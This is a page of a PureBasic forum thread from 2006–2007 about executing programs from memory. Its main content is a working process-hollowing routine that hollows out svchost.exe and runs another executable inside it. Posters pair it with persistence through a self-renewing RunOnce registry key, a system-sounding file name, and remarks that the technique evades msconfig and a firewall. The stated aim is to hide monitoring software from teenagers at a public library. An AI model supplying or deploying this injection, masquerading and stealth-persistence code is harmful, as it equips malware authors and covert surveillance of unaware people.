PureBasic Forums - English

http://www.purebasic.com
https://www.purebasic.fr/english/

Execute EXE from memory Lib

https://www.purebasic.fr/english/viewtopic.php?t=22382

Page 5 of 7

Posted: Wed Jun 28, 2006 6:32 pm
by Inf0Byt3
No problem :D

Posted: Sat Jul 15, 2006 9:26 pm
by fsw
Here:

http://www.purebasic.fr/german/viewtopic.php?t=9172

in the german forum is code to execute a program from memory.

Works pretty good.

If you start the program like RINGS suggested you don't see "Notepad" in the "Task Manager" anymore.

Posted: Sat Jul 15, 2006 10:20 pm
by Inf0Byt3
Thank you very very much for sowing us :!:

Posted: Sun Jul 16, 2006 3:23 pm
by thefool
Interesting!

Posted: Sun Jul 16, 2006 7:15 pm
by ricardo
fsw wrote:Here:

http://www.purebasic.fr/german/viewtopic.php?t=9172

in the german forum is code to execute a program from memory.

Works pretty good.

If you start the program like RINGS suggested you don't see "Notepad" in the "Task Manager" anymore.
Interesting!

How to know the path to iexplore.exe? Registry?

Posted: Sun Jul 16, 2006 8:40 pm
by Inf0Byt3
Just run it like this:

Code: Select all

RunProgram("iexplore.exe","","")
You don't need a valid path since it is added in the environment path.

Posted: Sun Jul 16, 2006 9:54 pm
by Henrik
@ricardo is it important that it is iexplorer? otherwise you could use Explorer.exe
and get the drive letter with GetWindowsDirectory(

Code: Select all

WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
injectfile(WinPath.s+"\explorer.exe",buffer)
Ups. it's Maxus topic, maybe there should be a new topic for the German code

Best Henrik

Posted: Sun Jul 16, 2006 11:11 pm
by ricardo
Henrik wrote:@ricardo is it important that it is iexplorer? otherwise you could use Explorer.exe
and get the drive letter with GetWindowsDirectory(

Code: Select all

WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
injectfile(WinPath.s+"\explorer.exe",buffer)
Ups. it's Maxus topic, maybe there should be a new topic for the German code

Best Henrik
Thanks for your answer.

Yes, the best solution is using iexplore.exe at least if you want to use this option to create some 'parental control' to surfing.
Kids will not notice that some additional process is running if it shows as iexplore.exe i guess.

Posted: Sun Jul 16, 2006 11:12 pm
by ricardo
Inf0Byt3 wrote:Just run it like this:

Code: Select all

RunProgram("iexplore.exe","","")
You don't need a valid path since it is added in the environment path.
Yes, but its for the code they showed in German forum. Really nice code!!

Posted: Mon Jul 17, 2006 9:06 pm
by Henrik
@ricardo Oh it was something about a school ?
Well Is it XP-Boxes your running, then why not use "svchost.exe" insted of iexplorer, and use regedit "RunOnce"
this i used when you install and you need to reboot the box and run right away when windows starts again.

When i do this even my ZAPro don't complain about the injection.
But the RunOnce gets delete after the program has run.
Lets say your compiled your program as "rsass.exe" cus it sounds like something that could be en the "%systemroot%\System32\" folder, then copy your rsass.exe to the ..\windows\System32\rsass.exe
And it will run immediately when windows strats up, and just before rsass.exe ends it sets a new RunOnce in the reg.

You need of course to run this code once first time and then reboot your system.

Oh and another thing i dosn't show up in "msconfig -> Start" cuse it was only ment to be used once, but who cares about that :wink:

Code: Select all

;// EXE Datei vom Ram ausführen!
;//Fra Tysk forum:
;// http://www.purebasic.fr/german/viewtopic.php?t=9172&postdays=0&postorder=asc&start=0


Prototype.l ZwUnmapViewOfSectionPT(Processhandle.l,BaseAdress.l)
ntdll = GetModuleHandle_("ntdll.dll")
Global ZwUnmapViewOfSection_.ZwUnmapViewOfSectionPT = GetProcAddress_(ntdll,"ZwUnmapViewOfSection")
Global WinPath.s
Structure IMAGE_SECTION_HEADER
  Name.b[8]
  StructureUnion
    PhysicalAddress.l
    VirtualSize.l
  EndStructureUnion
  VirtualAddress.l
  SizeOfRawData.l
  PointerToRawData.l
  PointerToRelocations.l
  PointerToLinenumbers.l
  NumberOfRelocations.w
  NumberOfLinenumbers.w
  Characteristics.l
EndStructure


Procedure injectfile(lpProcessname.s, lpBuffer.l)
;Declare
  Structure IMAGE_SECTION_HEADERS
    a.IMAGE_SECTION_HEADER[95]
  EndStructure
 
  Result.l = 0
  Startupinfo.STARTUPINFO
  ProcessInfo.PROCESS_INFORMATION
  Context.CONTEXT
  BaseAddress.l
  lpNumberOfBytesRead.l
  lpNumberOfBytesWritten.w
  *NtHeaders.IMAGE_NT_HEADERS
  *Sections.IMAGE_SECTION_HEADERS
  i.l

;---
Result = #False
ZeroMemory_(@StartupInfo, SizeOf(STARTUPINFO));
StartupInfo\cb = SizeOf(STARTUPINFO)
StartupInfo\dwFlags = #STARTF_USESHOWWINDOW
StartupInfo\wShowWindow = #SW_SHOW

If CreateProcess_(lpProcessname,#NUL,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)
;If CreateProcess_(#NUL,lpProcessname,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)

  Context\ContextFlags = #CONTEXT_INTEGER
  GetThreadContext_(ProcessInfo\hThread, Context);
  ReadProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesRead)
 
  If ZwUnmapViewOfSection_(ProcessInfo\hProcess,BaseAddress) >= 0
   
    *adr.IMAGE_DOS_HEADER = lpBuffer
    *NtHeaders = lpBuffer + *adr\e_lfanew
   
    BaseAddress = VirtualAllocEx_(ProcessInfo\hProcess,*NtHeaders\OptionalHeader\ImageBase,*NtHeaders\OptionalHeader\SizeOfImage,#MEM_RESERVE | #MEM_COMMIT, #PAGE_READWRITE)
    WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress,lpBuffer,*NtHeaders\OptionalHeader\SizeOfHeaders,@lpNumberOfBytesWritten)

    *Sections = @*NtHeaders\OptionalHeader + *NtHeaders\FileHeader\SizeOfOptionalHeader
   
    For i = 0 To *NtHeaders\FileHeader\NumberOfSections-1
WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress+*Sections\a[i]\VirtualAddress,lpBuffer+*Sections\a[i]\PointerToRawData,*Sections\a[i]\SizeOfRawData,@lpNumberOfBytesWritten)
    Next
   
    WriteProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesWritten)
    Context\Eax = BaseAddress + *NtHeaders\OptionalHeader\AddressOfEntryPoint
    Result = SetThreadContext_(ProcessInfo\hThread, Context)
    If Result
          ResumeThread_(ProcessInfo\hThread)
        Else
          TerminateProcess_(ProcessInfo\hProcess, 0);
          CloseHandle_(ProcessInfo\hProcess)
          CloseHandle_(ProcessInfo\hThread)
    EndIf
   
   
  EndIf
EndIf

EndProcedure



WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
If ReadFile(0,WinPath.s+"\System32\notepad.exe")
  buffer = AllocateMemory(Lof(0)) ; Datei ganz normal in einen buffer lesen
  ReadData(0,buffer,Lof(0))
  CloseFile(0)
EndIf

injectfile(WinPath.s+"\System32\svchost.exe",buffer) ; nun führen wir den buffer im addressraum von paint aus!

Delay(1000)

If RegCreateKeyEx_(#HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\RunOnce", 0, 0, #REG_OPTION_NON_VOLATILE, #KEY_ALL_ACCESS, 0, @NewKey, @KeyInfo) = #ERROR_SUCCESS 
  StringBuffer$ = WinPath.s+"\System32\rsass.exe"     ; change Path to a string with the full path to your program!!!
  RegSetValueEx_(NewKey, "TestRsass", 0, #REG_SZ,  StringBuffer$, Len(StringBuffer$)+1)   ; change "Programname" to your individual name
  RegCloseKey_(NewKey) 
EndIf


; Filename.s=Space(1024)
; myFilename=GetModuleFileName_(0,Filename,1024)
; injectfile(Filename,buffer) ; nun führen wir den buffer im addressraum von uns selber(kopie) aus!
Best Henrik

Posted: Mon Jul 17, 2006 11:53 pm
by ricardo
Henrik wrote:@ricardo Oh it was something about a school ?
Its about a public library in my town, mainly used by teenagers and they are damm smart!

Thats why i guess if the app is runned as iexplore.exe will be harder for them to notice that there are something unusuall running. But i need to find a way to know the path to iexplore.exe because im not sure its slways in same path.

Thanks for your help and comments!! :D

Posted: Mon Jul 24, 2006 6:55 pm
by ricardo
Its possible to convert this code to PB 3.94?

Posted: Fri Jan 19, 2007 11:40 pm
by stubbsi
you point us to this topic, but the link to download no longer works???

Posted: Fri Jul 20, 2007 10:45 am
by Sanders
please can someone post a working link to the fshrink package (zip) with source

please

Sanders

Posted: Tue Jul 24, 2007 6:57 am
by Maxus
Look in first Post. Link is Work.
All times are UTC+01:00
Page 5 of 7

Powered by phpBB® Forum Software © phpBB Limited